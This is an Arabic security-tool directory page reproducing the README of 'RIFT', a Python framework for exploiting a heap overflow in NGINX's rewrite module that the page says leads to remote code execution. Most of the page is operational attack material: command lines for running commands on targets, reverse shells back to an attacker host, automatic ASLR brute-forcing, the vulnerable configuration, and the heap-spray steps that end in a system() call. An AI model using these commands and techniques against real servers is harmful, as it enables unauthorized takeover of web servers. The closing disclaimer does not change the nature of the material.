Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-42945 — تم العثور على خلل في NGINX، وتحديدًا داخل ngx_http_rewrite_module. يمكن للمهاجم غير المصادق عليه استغلال هذه الثغرة عن طريق إرسال طلبات HTTP مصممة خصيصًا تحت تكوينات إعادة كتابة محددة. يمكن أن يؤدي ذلك إلى تجاوز سعة المخزن المؤقت على الكومة في عملية NGINX العاملة، مما قد يؤدي إلى تنفيذ تعليمات برمجية عشوائية. | Kitploit
أدوات/GitHubGitHub/aratane/cve-2026-42945
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubaratane/cve-2026-42945

CVE-2026-42945

عرض المستودع
13منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

تم العثور على خلل في NGINX، وتحديدًا داخل ngx_http_rewrite_module. يمكن للمهاجم غير المصادق عليه استغلال هذه الثغرة عن طريق إرسال طلبات HTTP مصممة خصيصًا تحت تكوينات إعادة كتابة محددة. يمكن أن يؤدي ذلك إلى تجاوز سعة المخزن المؤقت على الكومة في عملية NGINX العاملة، مما قد يؤدي إلى تنفيذ تعليمات برمجية عشوائية.

مشاركة

RIFT — Remote Injection & Fault Trigger

المؤلف: Michael Sanji Winaya Prawiradibrata
المؤلف المشارك بالذكاء الاصطناعي: Varanus — صديقي

إطار عمل لاستغلال تجاوز سعة المخزن المؤقت للكومة يستهدف وحدة ngx_http_rewrite_module الخاصة بـ NGINX.
أداة واحدة للاستطلاع + الاستغلال. بدون تبعيات خارجية.


محتوى المستودع

الملفالوصف
rift.pyالأداة الرئيسية. مزيج من الاستطلاع والاستغلال في نص واحد (1026 سطرًا).
README.mdهذه الوثيقة.

المتطلبات

  • Python 3.6+ (مكتبة قياسية فقط — لا pip، لا venv، لا تبعيات)

طريقة سريعة

root@kitploit:~
# 1. استطلاع كامل — كشف الإصدار، نقاط النهاية، الثغرات، الاستراتيجية
python3 rift.py --target 10.10.10.10 --recon

# 2. استطلاع + استغلال في جولة واحدة
python3 rift.py --target 10.10.10.10 --auto --cmd "id"

# 3. تنفيذ أمر
python3 rift.py --target 10.10.10.10 --cmd "whoami"

# 4. شل عكسي (فتح المستمع تلقائيًا)
python3 rift.py --target 10.10.10.10 --shell --lhost 10.10.14.5 --lport 4444

# 5. شل عكسي باستخدام bash (بدلاً من python)
python3 rift.py --target 10.10.10.10 --shell --shell-type bash --lhost 10.10.14.5 --lport 4444

# 6. فقط تحقق من قابلية الاستغلال
python3 rift.py --target 10.10.10.10 --check-only

جميع العلامات (Flags)

وضع الاستخدام

خيارات الاستغلال

خيارات الاستطلاع


الميزات البارزة

✅ شل عكسي تلقائي

عند استخدام --shell، يقوم السكريبت تلقائيًا بـ:

  1. إنشاء حمولة الشل العكسي حسب --shell-type
  2. فتح مستمع على --lport
  3. إرسال الاستغلال
  4. بمجرد تعطل العامل ← وصول الشل
  5. مستمع تلقائي: إعطاء الأولوية لـ netcat (nc -lvnp)، والرجوع إلى مستمع Python

✅ القوة العمياء التلقائية لـ ASLR

إذا فشلت العناوين الافتراضية، يقوم السكريبت تلقائيًا بتحريك قاعدة الكومة ±5 خطوات × 0x10000، بحثًا عن عنوان مناسب. لا حاجة لإعداد يدوي.

✅ حمولات شل عكسي متعددة

4 أنواع من حمولات الشل — python، bash، nc، php. اختر ما هو متاح على الهدف.

✅ استطلاع كامل

--recon ينفذ 5 مراحل:

  1. البصمة — كشف إصدار NGINX، 15 نقطة نهاية شائعة، وحدة إعادة الكتابة
  2. تسريب المعلومات — عنوان الذاكرة في صفحة الخطأ، قناة جانبية للتوقيت
  3. اختبار نقطة النهاية — سلوك نقطة النهاية مع 6 أنواع من الحمولات
  4. عدد العمال — تقدير عدد عمليات العامل من نمط زمن الاستجابة
  5. الاستراتيجية — توصية بالإجراء بناءً على نتائج التحليل

✅ إخراج JSON

--output json للتكامل مع أدوات أخرى أو التحليل الآلي.


التكوين القابل للاستغلال

الهدف من الاستغلال هو NGINX بالتكوين التالي rewrite + set:

root@kitploit:~
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # is_args = 1
    set $original_endpoint $1;                     # حساب الطول باستخدام is_args = 0
}

النتيجة: المخزن المؤقت المخصص صغير جدًا، ويؤدي هروب URI (توسع 3 أضعاف) إلى تجاوز السعة.

الإصدارات المتأثرة

  • NGINX مفتوح المصدر: 0.6.27 – 1.30.0
  • NGINX Plus: R32 – R36
  • تم الإصلاح: 1.31.0، 1.30.1، R36 P4+، R35 P2+، R32 P6+

آلية عمل الاستغلال

root@kitploit:~
1. رش الكومة ─── POST /spray × 20 → زرع ngx_pool_cleanup_s وهمي في الكومة
2. التشغيل ───── GET /api/AAAA...++++... → تجاوز عبر هروب URI
3. الإفساد ───── الكتابة فوق مؤشر التنظيف للمسبح المجاور
4. التنفيذ ───── تدمير المسبح → استدعاء system("command")

الثوابت الهامة (يمكن تغييرها في rift.py)


أمثلة كاملة

تنفيذ أمر + تفصيلي

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "cat /etc/passwd" --verbose

عنوان مخصص (تجاوز ASLR)

root@kitploit:~
python3 rift.py --target 10.10.10.10 \
    --cmd "id" \
    --heap-base 0x555555659000 \
    --libc-base 0x7ffff77ba000

محاولات متعددة

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "id" --tries 50

استطلاع + JSON

root@kitploit:~
python3 rift.py --target 10.10.10.10 --recon --output json

إنشاء سكريبت استغلال

root@kitploit:~
python3 rift.py --target 10.10.10.10 --generate-exploit
# → exploit_10_10_10_10.py

استكشاف الأخطاء وإصلاحها

"الهدف لا يبدو أنه يشغل NGINX"

  • تحقق من المنفذ: nc -zv <IP> 80
  • جرب منفذًا آخر: --port 8080، --port 443
  • ربما خلف WAF/بروكسي

"فشلت جميع محاولات الاستغلال"

  1. قد يكون ASRL نشطًا — جرب --auto للانزلاق التلقائي لـ ASLR
  2. قد يكون إصدار NGINX قد تم تصحيحه (> 1.30.1)
  3. قد لا يكون تكوين NGINX قابلاً للاستغلال (لا يستخدم rewrite+set)
  4. جرب --verbose لرؤية تفاصيل كل محاولة

الشل لا يتصل

  • تحقق من جدار الحماية المحلي: sudo ufw allow 4444
  • تحقق من --lhost — تأكد من صحة IP المحلي
  • جرب --shell-type bash أو --shell-type nc

إخلاء مسؤولية

أُنشئ لأغراض تعليمية واختبار الأمان المصرح به فقط.
استخدامه ضد أنظمة دون إذن هو غير قانوني.

© 2026 Michael Sanji Winaya Prawiradibrata
المؤلف المشارك بالذكاء الاصطناعي: Varanus

تنزيل الأداة
العلامةالوظيفة
--reconاستطلاع كامل. بصمة → تسريب معلومات → اختبار نقطة النهاية → عدد العمال → استراتيجية.
--autoاستطلاع + استغلال تلقائي. نفس --recon ثم الاستغلال.
--check-onlyفحص سريع. كشف NGINX، الإصدار، نقطة النهاية /api/.
--cmd "command"تنفيذ أمر واحد عبر system().
--shellشل عكسي — فتح المستمع تلقائيًا، إرسال الحمولة، استقبال الاتصال.
العلمالافتراضيالوظيفة
--port80منفذ الهدف
--lhost—عنوان IP المحلي للشل العكسي (إلزامي مع --shell)
--lport4444المنفذ المحلي للمستمع
--shell-typepythonحمولة الشل العكسي: python، bash، nc، php
--heap-base0x555555659000عنوان قاعدة الكومة (تجاوز لتفادي ASLR)
--libc-base0x7ffff77ba000عنوان قاعدة libc
--tries10محاولات لكل عنوان مرشح
--verbose / -v—إخراج تفصيلي لكل محاولة
العلامةالوظيفة
--fingerprintكشف إصدار NGINX، نقاط النهاية، وحدة إعادة الكتابة
--leakفحص تسريب المعلومات (عنوان الذاكرة في صفحة الخطأ، التوقيت)
--test-endpointاختبار سلوك نقطة النهاية بحمولات مختلفة
--endpointمسار نقطة النهاية للاختبار (الافتراضي: /api/)
--generate-exploitإنشاء سكريبت استغلال خاص بعنوان الهدف
--output jsonإخراج بصيغة JSON (قابل للقراءة آليًا) بالتزامن مع إخراج الطرفية
الثابتالافتراضيالمعنى
BODY_LEN4000حجم نص الرش (بايت)
N_SPRAY20عدد طلبات POST لكل محاولة
LIBC_SYSTEM_OFFSETS7 إدخالاتإزاحة system() لتوزيعات مختلفة
PREREAD_HEAP_OFFSETS19 إدخالاًإزاحات الكومة المرشحة
DEFAULT_HEAP_BASE0x555555659000قاعدة الكومة (ASLR معطل)
DEFAULT_LIBC_BASE0x7ffff77ba000قاعدة libc (ASLR معطل)